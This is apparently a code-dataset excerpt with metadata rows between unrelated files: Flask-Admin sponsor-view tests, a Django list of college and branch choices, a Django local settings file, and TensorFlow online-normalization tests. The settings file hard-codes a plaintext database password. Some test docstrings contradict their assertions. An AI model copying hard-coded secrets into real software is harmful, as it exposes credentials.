create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# access the sponsors tab
sponsor_list_response = client.get(url_for('sponsor.index_view'))
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# check that the response
# contains the sponsor id
self.assertIn(sponsor.id, sponsor_list_response.data.decode('utf-8'))
def test_admin_sponsor_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Sponsor no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do Sponsor: /admin/sponsor/details/
Verificamos:
- a pagina mostra o Sponsor certo
"""
# with
sponsor = makeOneSponsor()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_detail_url = url_for('sponsor.details_view', id=sponsor.id)
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# access the sponsors tab
sponsor_detail_response = client.get(sponsor_detail_url)
self.assertStatus(sponsor_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# check that the response
# contains the sponsor id
self.assertIn(sponsor.id, sponsor_detail_response.data.decode('utf-8'))
def test_admin_sponsor_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
expected_column_exclude_list = ('_id', )
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's excluded columns
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
self.assertEqual(len(expected_column_exclude_list), len(column_exclude_list))
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_sponsor_check_form_excluded_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que contém todos os campos excluidos do formulario são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's form excluded columns
form_excluded_columns = self.get_context_variable('admin_view').form_excluded_columns
self.assertEqual(None, form_excluded_columns)
def test_admin_sponsor_check_can_create_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Sponsor: /admin/sponsor/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_create flag
can_create = self.get_context_variable('admin_view').can_create
self.assertTrue(can_create)
def test_admin_sponsor_check_can_edit_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de Article: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_edit flag
can_edit = self.get_context_variable('admin_view').can_edit
self.assertTrue(can_edit)
def test_admin_sponsor_check_can_delete_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_delete flag
can_delete = self.get_context_variable('admin_view').can_delete
self.assertTrue(can_delete)
def test_admin_sponsor_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsor: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's create_modal flag
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_sponsor_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsor: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's edit_modal flag
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_sponsor_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
# when
with self.client as client:
# admin user login
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's can_view_details flag
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_sponsor_check_searchable_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de sponsors: /admin/sponsor/
Verificamos:
- que contém todos os campos de busca esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
sponsor_index_url = url_for('sponsor.index_view')
expected_column_searchable_list = ('name',)
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# access the sponsors tab
sponsor_list_response = client.get(sponsor_index_url)
self.assertStatus(sponsor_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# check the view's search fields
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
self.assertEqual(len(expected_column_searchable_list), len(column_searchable_list))
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
| 42.139025 | 173 | 0.557711 | 19,814 | 197,927 | 5.339255 | 0.029928 | 0.029946 | 0.016079 | 0.030891 | 0.926355 | 0.911392 | 0.896949 | 0.88553 | 0.871191 | 0.863317 | 0 | 0.006978 | 0.362836 | 197,927 | 4,696 | 174 | 42.147998 | 0.831895 | 0.202999 | 0 | 0.802902 | 0 | 0.000708 | 0.116864 | 0.019737 | 0 | 0 | 0 | 0.00362 | 0.197452 | 1 | 0.03857 | false | 0.08351 | 0.003892 | 0 | 0.044586 | 0.001062 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
999071ff969a1cc7004a3a8eac2e11f2eaad2108 | 5,621 | py | Python | user_details/all_choices.py | Shreyanshsachan/College-Predictor | 87068aa1d1a889ced586ff155bc2b5d9a78340f7 | ["MIT"] | null | null | null | user_details/all_choices.py | Shreyanshsachan/College-Predictor | 87068aa1d1a889ced586ff155bc2b5d9a78340f7 | ["MIT"] | null | null | null | user_details/all_choices.py | Shreyanshsachan/College-Predictor | 87068aa1d1a889ced586ff155bc2b5d9a78340f7 | ["MIT"] | null | null | null |
# Each choice is a (value, label) pair; value and label are identical here,
# so the pairs are generated from a single list of college/branch names.
_COLLEGE_BRANCHES = [
    'Indian Institute of Technology Bombay, Aerospace Engineering',
    'Indian Institute of Technology Bombay, Chemical Engineering',
    'Indian Institute of Technology Bombay, Civil Engineering',
    'Indian Institute of Technology Bombay, Computer Science and Engineering',
    'Indian Institute of Technology Bombay, Electrical Engineering',
    'Indian Institute of Technology Bombay, Electronics and Communication',
    'Indian Institute of Technology Bombay, Mechanical Engineering',
    'Indian Institute of Technology Delhi, Aerospace Engineering',
    'Indian Institute of Technology Delhi, Chemical Engineering',
    'Indian Institute of Technology Delhi, Civil Engineering',
    'Indian Institute of Technology Delhi, Computer Science and Engineering',
    'Indian Institute of Technology Delhi, Electrical Engineering',
    'Indian Institute of Technology Delhi, Electronics and Communication',
    'Indian Institute of Technology Delhi, Mechanical Engineering',
    'National Institute of Technology Surathkal, Chemical Engineering',
    'National Institute of Technology Surathkal, Civil Engineering',
    'National Institute of Technology Surathkal, Computer Science and Engineering',
    'National Institute of Technology Surathkal, Electrical Engineering',
    'National Institute of Technology Surathkal, Electronics and Communication',
    'National Institute of Technology Surathkal, Information Technology',
    'National Institute of Technology Surathkal, Mechanical Engineering',
    'National Institute of Technology Trichy, Chemical Engineering',
    'National Institute of Technology Trichy, Civil Engineering',
    'National Institute of Technology Trichy, Computer Science and Engineering',
    'National Institute of Technology Trichy, Electrical Engineering',
    'National Institute of Technology Trichy, Electronics and Communication',
    'National Institute of Technology Trichy, Information Technology',
    'National Institute of Technology Trichy, Mechanical Engineering',
    'Indian Institute of Information Technology Allahabad, Computer Science and Engineering',
    'Indian Institute of Information Technology Allahabad, Electrical Engineering',
    'Indian Institute of Information Technology Allahabad, Electronics and Communication',
    'Indian Institute of Information Technology Allahabad, Information Technology',
    'Indian Institute of Information Technology Delhi, Computer Science and Engineering',
    'Indian Institute of Information Technology Delhi, Electrical Engineering',
    'Indian Institute of Information Technology Delhi, Electronics and Communication',
    'Indian Institute of Information Technology Delhi, Information Technology',
]
COLLEGE_SELECTED = tuple((name, name) for name in _COLLEGE_BRANCHES)
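For context, a choices tuple like this is normally attached to a Django model or form field. A minimal sketch, assuming a hypothetical UserDetails model (the actual model in this repo may differ):

from django.db import models

from .all_choices import COLLEGE_SELECTED

class UserDetails(models.Model):
    # Stores the selected string; Django renders the choices as a dropdown.
    college_selected = models.CharField(
        max_length=255,
        choices=COLLEGE_SELECTED,
        blank=True,
    )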
| 73.960526
| 96
| 0.762854
| 558
| 5,621
| 7.682796
| 0.043011
| 0.184745
| 0.274318
| 0.209004
| 0.996501
| 0.996501
| 0.996501
| 0.96641
| 0.946583
| 0.946583
| 0
| 0
| 0.172567
| 5,621
| 76
| 97
| 73.960526
| 0.921737
| 0
| 0
| 0
| 0
| 0
| 0.858769
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
999a85652676dab16f19349b17f548ffc3f14849
| 2,308
|
py
|
Python
|
src/csgschool/local_settings.py
|
kaizer88/csg
|
e3de84438c5b7c0e4848300c02f06d81cbfa077f
|
[
"MIT"
] | null | null | null |
src/csgschool/local_settings.py
|
kaizer88/csg
|
e3de84438c5b7c0e4848300c02f06d81cbfa077f
|
[
"MIT"
] | null | null | null |
src/csgschool/local_settings.py
|
kaizer88/csg
|
e3de84438c5b7c0e4848300c02f06d81cbfa077f
|
[
"MIT"
] | null | null | null |
import os
from .settings import *
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'csg', # Or path to database file if using sqlite3.
'USER': 'postgres', # Not used with sqlite3.
# 'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'Lihle@2016', # Not used with sqlite3.
# 'PASSWORD': '', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
# 'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
},
# 'splicedb': {
# # 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
# 'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
# 'NAME': 'myhome', # Or path to database file if using sqlite3.
# 'USER': 'postgres', # Not used with sqlite3.
# # 'USER': 'root', # Not used with sqlite3.
# 'PASSWORD': 'Lihle@2016', # Not used with sqlite3.
# # 'PASSWORD': '', # Not used with sqlite3.
# 'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
# # 'PORT': '3306', # Set to empty string for default. Not used with sqlite3.
# 'PORT': '5432', # Set to empty string for default. Not used with sqlite3.
# }
}
ALLOWED_HOSTS = []
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_PORT = 587
EMAIL_USE_TLS = True
TIME_ZONE = 'Africa/Johannesburg'
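Hard-coding database and email credentials in a settings module is fragile; a common alternative is reading them from the environment. A minimal sketch under that assumption (the CSG_* variable names are hypothetical, not part of this project):

import os

# Override the hard-coded secrets with environment variables, falling back
# to the values defined above when the variables are unset.
DATABASES['default']['PASSWORD'] = os.environ.get(
    'CSG_DB_PASSWORD', DATABASES['default']['PASSWORD'])
EMAIL_HOST_PASSWORD = os.environ.get('CSG_EMAIL_PASSWORD', EMAIL_HOST_PASSWORD)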
| 48.083333
| 140
| 0.520364
| 231
| 2,308
| 5.125541
| 0.264069
| 0.08277
| 0.130068
| 0.212838
| 0.822635
| 0.822635
| 0.822635
| 0.822635
| 0.822635
| 0.822635
| 0
| 0.035547
| 0.353986
| 2,308
| 48
| 141
| 48.083333
| 0.758551
| 0.67721
| 0
| 0
| 0
| 0
| 0.18156
| 0.053901
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.130435
| 0.173913
| 0
| 0.173913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5136c13673f01659337be43f2aeaddccbd5ffe29
| 16,374
|
py
|
Python
|
online-norm/tensorflow/tests/test_online_norm.py
|
ClashLuke/online-normalization
|
fe08b9f8e288d628eee4f9991e562cdb4f9e997b
|
[
"BSD-3-Clause"
] | 55
|
2019-09-04T06:24:39.000Z
|
2022-02-27T21:07:36.000Z
|
online-norm/tensorflow/tests/test_online_norm.py
|
ClashLuke/online-normalization
|
fe08b9f8e288d628eee4f9991e562cdb4f9e997b
|
[
"BSD-3-Clause"
] | 7
|
2019-12-28T05:17:19.000Z
|
2021-10-19T20:45:56.000Z
|
online-norm/tensorflow/tests/test_online_norm.py
|
ClashLuke/online-normalization
|
fe08b9f8e288d628eee4f9991e562cdb4f9e997b
|
[
"BSD-3-Clause"
] | 16
|
2019-09-08T09:54:42.000Z
|
2022-03-22T22:32:59.000Z
|
"""
Released under BSD 3-Clause License,
Copyright (c) 2019 Cerebras Systems Inc.
All rights reserved.
Testing for Online Normalization Layer using numpy reference
"""
import os
import sys
import unittest
import numpy as np
import tensorflow as tf
from online_norm_tf import online_norm
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/../..")
from numpy_on import OnlineNorm1d as NpOnlineNorm1d
from numpy_on import OnlineNorm2d as NpOnlineNorm2d
from tensorflow.keras.mixed_precision.experimental import Policy
tf.logging.set_verbosity(tf.logging.ERROR)
class TestOnlineNorm(unittest.TestCase):
def template_numerical_comparison_on_vs_np(
self,
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
dtype=None,
):
in_shape = np_inputs.shape
batch_size = in_shape[0]
NpOnlineNorm = NpOnlineNorm2d if len(in_shape) == 4 else NpOnlineNorm1d
# Instantiate numpy layer
np_norm = NpOnlineNorm(
in_shape[1],
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
affine=False,
ecm='',
)
# Instantiate the tf implementation of online norm layer
# without batch acceleration
        if dtype is None:
            tf_inputs = tf.placeholder(tf.float32, shape=in_shape)
        else:
            tf_inputs = tf.placeholder(tf.float16, shape=in_shape)
tf_norm = online_norm(
tf_inputs,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
axis=axis,
training=True,
center=False,
scale=False,
ecm='',
dtype=dtype,
)
if np_grad_out is not None:
# set up tf_norm's gradient functionality
            if dtype is None:
                tf_grad_ys = tf.placeholder(tf.float32, shape=in_shape)
            else:
                tf_grad_ys = tf.placeholder(tf.float16, shape=in_shape)
tf_norm_grad = tf.gradients(
ys=tf_norm,
xs=tf_inputs,
grad_ys=tf_grad_ys
)
        rtol = 1e-4 if dtype is None else 1e-2
        atol = 1e-5 if dtype is None else 1e-3
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# Iterate over generated data
for itr in range(itrs):
# fprop through numpy Online Norm class
np_out = np_norm(np_inputs)
if np_grad_out is not None:
# bprop through numpy Online Norm class
np_grad_in = np_norm.backward(np_grad_out)
if np_grad_out is None:
# get the output of the tf layer
on_tf_out = sess.run(
[tf_norm],
feed_dict={tf_inputs: np_inputs}
)
out = np.array(on_tf_out[0])
for n in range(batch_size):
# numerically compare output
                        err_msg = f'output comparison failed on itr: {itr}, n: {n}'
np.testing.assert_allclose(
out[n],
np_out[n],
rtol=rtol, atol=atol, err_msg=err_msg
)
if np_grad_out is not None:
# get the deltas of the tf layer
grad_dict = {tf_grad_ys: np_grad_out,
tf_inputs: np_inputs}
tf_grad_xs = np.array(
sess.run(
[tf_norm_grad],
feed_dict=grad_dict
)[0][0]
)
for n in range(batch_size):
# numerically compare deltas
                        err_msg = f'grad comparison failed on itr: {itr}, n: {n}'
np.testing.assert_allclose(
tf_grad_xs[n],
np_grad_in[n],
rtol=rtol, atol=atol, err_msg=err_msg
)
def test0211_1d_numerical_comparison_on_fprop_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0221_2d_numerical_comparison_on_fprop_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test021_1d_numerical_comparison_on_fprop_vs_np(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test022_2d_numerical_comparison_on_fprop_vs_np(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0311_1d_numerical_comparison_on_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0321_2d_numerical_comparison_on_vs_np_batchsize1(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test031_1d_numerical_comparison_on_vs_np(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test032_2d_numerical_comparison_on_vs_np(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
)
def test0411_1d_numerical_comparison_on_fprop_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test0421_2d_numerical_comparison_on_fprop_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test041_1d_numerical_comparison_on_fprop_vs_np_mp(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test042_2d_numerical_comparison_on_fprop_vs_np_mp(
self,
batch_size=8,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer's fprop against numpy implementation for 2d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=None,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test0511_1d_numerical_comparison_on_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 1d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test0521_2d_numerical_comparison_on_vs_np_batchsize1_mp(
self,
batch_size=1,
num_features=16,
height=45,
width=64,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=16,
):
"""
Test ON Layer against numpy implementation for 2d inputs at batch size 1
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features, height, width) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features, height, width) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test051_1d_numerical_comparison_on_vs_np_mp(
self,
batch_size=8,
num_features=16,
alpha_fwd=0.99,
alpha_bkw=0.99,
itrs=2,
):
"""
Test ON Layer against numpy implementation for 1d inputs
"""
# create inputs
np_inputs = np.random.randn(batch_size, num_features) + .25
# instantiate gradient at the output
np_grad_out = np.random.randn(batch_size, num_features) + .125
tf.keras.backend.set_floatx('float16')
self.template_numerical_comparison_on_vs_np(
np_inputs,
np_grad_out=np_grad_out,
axis=1,
alpha_fwd=alpha_fwd,
alpha_bkw=alpha_bkw,
itrs=itrs,
dtype=Policy('infer_float32_vars'),
)
def test052_2d_numerical_comparison_on_vs_np_mp(
self,
batch_size=8,
